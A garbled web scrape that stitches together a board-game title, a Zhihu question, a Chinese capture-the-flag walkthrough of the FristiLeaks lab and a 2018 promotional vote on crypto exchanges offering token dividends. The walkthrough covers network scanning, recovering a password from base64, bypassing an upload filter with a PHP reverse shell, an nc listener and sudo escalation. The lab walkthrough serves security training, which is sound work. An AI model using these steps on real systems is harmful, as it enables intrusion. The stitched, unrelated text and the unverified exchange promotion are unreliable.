儿童桌游 Schnappt Hubi! - Smiling AppleSmiling Apple
Oops! It appears that you have disabled your Javascript. In order for you to see this page as it is meant to appear, we ask that you please re-enable your Javascript!Hubi交易平台靠谱吗？ - 知乎有问题，上知乎。知乎作为中文互联网最大的知识分享平台，以「知识连接一切」为愿景，致力于构建一个人人都可以便捷接入的知识分享网络，让人们便捷地与世界分享知识、经验和见解，发现更大的世界。2被浏览6分享邀请回答赞同 添加评论分享收藏感谢收起写回答渗透测试系列 — VulnHub – FristiLeaks v1.3 - FreeBuf专栏·红日安全团队
渗透测试系列 — VulnHub – FristiLeaks v1.3
首发专栏：关注
渗透测试系列是红日安全全新一个系列，主要依托vulhub环境，进行CTF攻防系列。Vulhub环境简单下载，可以直接在虚拟机进行运行，去掉了环境安装困难问题。如果有什么问题，在公众号 “sec-redclub”后台回复问题，小编会为大家解答。
VulnHub – FristiLeaks v1.3
Virtualbox （二选一)
Vnware Workstation player
然后开启VM
Netdiscover –r 10.10.10.0/24
可以发现目标主机在10.10.10.132的位置
nmap -sS -Pn -T4 -p- 10.10.10.132
可以看到打开了80端口，service为HTTP
枚举80端口
既然只有一个端口，那就扫描再具体扫描80端口：
nmap -A -O -p80 10.10.10.132
我们看到以下具体信息： Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3) http-robots.txt: 3 disallowed entries
现在我们浏览web服务
现在我们需要验证robots.txt是否存在，在很多情况下，nmap是很准确的。
现在，如果根据条目能顺利进入系统，那就太容易了，肯定不会那么容易的。
意料之中，上面三个条目都只能进入这个画面 所以这三个已经没有什么用了，我们现在来跑一下目录；
没什么特别的发现，只有几张照片；
不过这个keep-calm 似乎是一个提示，因为他说 KEEP CALM AND DRINK FRISTI 试试http://10.10.10.132/fristi/
我们再次运行 目录枚举：
发现了index页面 不过…
好像是个死胡同。
不过永远不要只事物看到表面，我们一定要看看代码！
看到一有一条信息，这是一个叫eezeepz的人留下来的。
那么那就有这种可能：他也许用eezeepz当做他的用户名或者密码。
再向下看。我们看到了一大块用base64编码的段落
这里我使用nano 使它变成单行，方便命令行编码
base64 -d /tmp/encoded.txt
这是一个PNG格式的图画，保存为PNG
base64 -d /tmp/encoded.txt & decoded.png
然后可以用任意工具查看，这里用feh
看起来像是个密码！赶紧试试 username:eezeepz password:keKkeKKeKKeKkEkkEk
这时候 不用多说 上传sell
Sell 可以在这里下载
cp /usr/share/webshells/php/php-reverse-shell.php reverse-shell.php
vi reverse-shell.php
做一些必要的修改，ip地址和监听端口。
现在设置 netcat 监听 建立连接：
nc -nlvp 8888
看来只有png, jpg, gif 能上传
修改一下后缀加上.jpg
上传成功！
现在打开上传的sell
现在已经得到了一个低权限权限
看一下目录，看看有什么可以挖掘的东西，个人对HOME比较感兴趣，进去试试
居然马上看到关键人物eezeepz！继续向前看
文件很多 挑特别的看，notes.txt比较显眼，打开试试。
我们得到了提示，照着做就行了！在/tmp下创建一个＂runtis＂文件
我们得到了提示，照着做就行了！在/tmp下创建一个＂runtis＂文件
现在我们可以阅读 /home/admin 下的内容了
有几个文件。依次看一下
Cryptepass.txt
whoisyourgodnow.txt
看样子应该是用了py文件去加密的。我们重写一下文件：
1.mVGZ3O3omkJLmy2pcuTq
：thisisalsopw123
2.=RFn0AKnlMHMPIzpyuTI0ITG ：LetThereBeFristi!
这有可能是用户fristgod 的密码我们换一下用户试试！
失败了….查了一下网上是这样解释的：跟 su 命令的实现有关； B环境上su的实现应该是判断标准输入是不是tty ； 而A环境上su的实现则允许从其他文件读取密码。方法如下：
Python -c ‘pty.spawn(“/bin/sh”)’
接下来就可以正常使用了。
现在我们已经成功进入fristigod账户
没有东西…
原来都藏起来了。。到.secret_admin_stuff看看
-la 查看具体信息
发现这个是个root的文件权限应该是不够的
我们能回去看看history有没有一些线索
可以看到 “fristigod”用户一直sudo来执行命令
试试 sudo -l
让输入密码，上面我们得到了两个密码
呃。。。再试试
成功了...居然是一个密码....好吧。
必须您当前尚未登录。
必须（保密）
可以给我们打个分吗？比特之星榜-十大实力最强挖矿交易所比特之星榜-十大实力最强挖矿交易所区间集百家号（如果您无法显示投票按钮，留言区留下交易所名字即可）自5月下旬“交易挖矿”模式诞生，一个多月时间，震动各大数字货币交易所。一时间该模式几乎成为新、老交易所发展的风向标。然，行之者虽众，但良莠不齐，加之区块链行业舆论混杂，给数字货币参与者选择交易所时增加不确定性。为此，区间集发起“比特之星榜-十大实力最强挖矿交易所”投票评选活动，旨在评选出目前行业内以“交易挖矿”模式实力最强的十家交易所，以供参与者在选择交易所时提供有意义的参考方向。此次活动，区间集从市面上繁多的交易所中挑出20家挖矿交易所，作为参与者们投票备选项目。本次活动，区间集将发扬区块链公开透明的精神，欢迎活动参与者们提出宝贵的意见。“比特之星榜”是区间集为了致敬中本聪创建比特币而发起的行业评选活动。其中，“比特”一词倡导公心为社区的区块链精神；“星”出自“星星之火可以燎原”，预示区块链未来浩浩汤汤的发展大势。接下来，“比特之星榜”将致力服务于具有社区精神的区块链项目，为行业创新者赋能。交易所：Fcoin交易挖矿上线时间：2018年5月项目简介：前火币CTO张健团队分红方式：目前100%的平台收入分给持有者，按照FT持有量进行分红。待FT流通量达到30亿之后，调至80%的比例。代币发行总量：100亿枚FT。交易所：Bit-Z交易挖矿上线时间：2018年6月项目简介：Bit-Z，2016年创立于香港，提供数字资产交易及OTC（场外交易）服务。分红方式：“交易挖矿”，参与交易的用户，可获手续费返款（以等值BZ形式返还，需完成三级认证）；每期1000万BZ，逐步释放，每完成1000万挖矿自动进入下一期。每期返还比例递减3%；代币发行总量：12亿枚BZ。交易所：Xstar交易挖矿上线时间：2018年6月项目简介：Xstar交易所是由区块链资深从业者熊立健团队创建。分红方式：用户交易手续费的 100%，将通过挖矿产出的 XT，返还到用户手中。每天发放一次。用户前一天挖矿产出的 XT，次日发放。代币发行总量：10亿枚XT。交易所：TTEX交易挖矿上线时间：2018年6月项目简介：TTEX于今年5月份成立。天天交易所采用评审委员会制度，邀请业内专家组成评审委员会，对上线项目进行投票评审。分红方式：TTEX将拿出80%的交易手续费收入按比例分配给TTF的持有者，按日累积，并于TTF上线交易后择机将累积部分一次性发放，之后按日发放给TTF持有者。代币发行总量：100亿枚TTF。交易所：TOPBTC交易挖矿上线时间：2018年6月项目简介：TOPBTC是一家位于澳洲的交易平台，目前中国用户占60%以上，日本、韩国、俄罗斯、乌克兰、印尼等世界各地用户40%。分红方式：TOPB是TOPBTC平台推出的平台币。TOPA是TOPBTC平台推出的挖矿币。TOPB与TOPA的持有者可享有交易手续费的90%分红权益，各自45%。代币发行总量：100亿枚TOPA。交易所：Coineal交易挖矿上线时间：2018年6月项目简介：Coineal由中韩两国区块链从业者创立，目前已在中国和韩国设立独立运营中心，交易所于今年4月份正式上线。分红方式：平台每日手续费收入的80%分享给每个NEAL持有者，20%作为发展基金。代币发行总量：100亿枚NEAL。交易所：Coinbene交易挖矿上线时间：2018年6月项目简介：Coinbene 满币网是由原OKCoin、百度、美团、JP Mogran公司成员组成的团队。分红方式：每月8日将拿出平台上个月手续费的40%，用于奖励Coni的持币用户，第一期奖励时间为7月8日，并以此类推。随着平台的发展后续将以每周分红的形式代替每月分红。代币发行总量：10亿枚Coni。交易所：Aacoin挖矿交易上线时间：2018年6月项目简介：AAcoin是人工智能数字资产交易平台，其总部位于英国，由AAcoin全球业务团队负责运营。分红方式：平台拿出手续费收益的50%对AAT的持有者进行分红，30%对AMM的持有者进行分红，根据用户当时持有AAT（AMM）的总量占平台AAT（AMM）总持仓量的比例进行分配。发行代币总量：20亿枚AAT，50亿枚AMM。交易所：BKEX挖矿交易上线时间：2018年6月项目简介： BKEX 通过公链实现数字资产存贮、项目众筹、资产发行，及基于 DPOS 的超级节点决策系统，服务数字交易平台。分红方式：每日平台收益的100%将按照BKK持有比例分配给BKK持有者。返还将于次日以USDT形式发放。隔天登陆奖励失效。发行代币总量：30亿枚BKK。交易所：TOP.ONE挖矿交易上线时间：2018年6月项目简介：TOP.ONE团队主要来自互联网和金融行业，该平台专注于一带一路等新兴市场。分红方式：矿区手续费收入的 80% 将按比例分配给 TOP.ONE 交易所用户。代币发行总量：100亿枚ONE。交易所：Btcdo挖矿交易上线时间：2018年6月项目简介：Btcdo 隶属于Canadian Digital Asset Exchange In的一家数字货币交易平台。分红方式：交易即挖矿，100%返BT；持BT即享平台交易手续费70%分红。代币发行总量：100亿枚BT。交易所：CoinPark挖矿交易上线时间：2018年6月项目简介：由老交易所BIbox联手BiBOX Fund 、FBG、丹华资本、BlockWater Capital、八维资本、臻果基金等数字基金投资的。分红方式：CoinPark前两周会将平台总收益的100%作为分红奖励（后续会调整为90%），奖励给持有CP的用户。代币发行总量：100亿枚CP。 交易所：X网交易挖矿上线时间：2018年6月项目简介：X网获得哈希资本、飞马资本、广和集团、老王资本、满币资本等投资。据悉，X网目前用户突破85万。分红方式：平台收入的80%交易手续费分配给OCX代币持有者，共建OCX生态；另外20%的交易手续费收入用来支持平台的开发及运营和社区建设。代币发行总量：10亿枚OCX。交易所：BTEX交易挖矿上线时间：2018年6月项目简介：BTEX.COM成立于2018年1月，注册于BVI（英国维京群岛），实际办公地点位于香港、白俄罗斯等地。分红方式：前三个月平台利润100%分发给BT持有者，三个月后80%分发给BT持有者，20%回购BT并销毁。代币发行总量：40亿枚BT。交易所：PARK.ONE挖矿交易上线时间：2018年6月项目简介：PARK.ONE平台系统采用区块链分布式账本记账、验证，完成交易双方对接。在区块链公开的信息中，公平交易、随时验算，保证纯粹和透明公开。分红方式：每个季度平台拿出收入的80%回购PARK，销毁至10亿枚 。代币发行总量：100枚Park。交易所：Onechain交易挖矿上线时间：2018年6月项目简介：由比特币早期参与者黄华容创建，交易所于2018年1月上线分红方式：将交易手续费100%通过ONE的形式，奖励给用户。代币发行总量：100亿枚ONE。交易所：币虎交易挖矿上线时间：2018年6月项目简介：币虎全球是一家设立在新加坡，布局在马尼拉、香港、马来西亚等地区。发起人Janus Yeo是新加坡人，毕业于新加坡国立大学工商管理学士学位，现任新加坡石油凯万投资公司投资总监兼董事。分红方式：用户分得100%的HUBI币奖励；持有HUBI币用户分红 = 持有HUBI币快照时数量/（已产生HUBI币流通总量-已销毁数量）*当日平台总交易手续费50%代币发行总量：10亿枚HUBI。交易所：DragonEX交易挖矿上线时间：2017年11月项目简介：DragonEx是新加坡虚拟货币交易平台，成立于2017年11月。DragonEx是世界上第一个实行交易挖矿模式的交易所。分红方式：每日平台收益的100%将按照龙币持有比例，全部分配给所有支持者。发行代币总量：枚DT。交易所：ABCC交易挖矿上线时间：2018年6月项目简介：ABCC平台由新加坡前议员郑恩里(CEO)与众多合作伙伴联合创立。现已对外公布获得包括泛城资本与追梦者基金等众多机构的投资。分红方式：ABCC平台每日收益的80%将分配给持有ABCC平台币的用户。代币发行总量：2.1亿枚CNN交易所：CoinEX挖矿交易上线时间：预计2018年7月项目简介：CoinEx成立于2017年12月，其核心团队来互联网及金融业从业者，包括多名数字货币行业最早期从业者及投资者。分红方式：将平台100%交易费收入按市值折算发行对应数量的CET，并按交易量占比全部返还给交易用户。发行代币总量：100亿枚CET。评选规则1.应在20条备选交易所项目的范围内进行评选，最终产生10个交易挖矿项目交易所名单。2.网络投票占比50%。由微信、网站等各投票渠道结果综合而成。3.区间集智库专家投票占比50%。各区间集智库专家评委本着公正、严谨的原则，在评选标准的指导下填写选票，采取区间集智库专家投票与集体讨论结合的方式。4.有争议处由区间集智库专家根据评选标准协商解决。本次活动最终解释权归区间集所有
本次评选结果将于2018年7月份公布。声明：本文系区间集原创稿件，版权属区间集所有，未经授权不得转载，已经协议授权的媒体下载使用时须注明&稿件来源：区间集&，违者将依法追究责任。本文由百家号作者上传并发布，百家号仅提供信息发布平台。文章仅代表作者个人观点，不代表百度立场。未经作者许可，不得转载。区间集百家号最近更新：简介:区块链的每一次进步，都有你我的记录。作者最新文章相关文章拒绝访问 | www.vrrb.cn | 百度云加速
请打开cookies.
此网站 (www.vrrb.cn) 的管理员禁止了您的访问。原因是您的访问包含了非浏览器特征(44c9f061b2784394-ua98).
重新安装浏览器，或使用别的浏览器}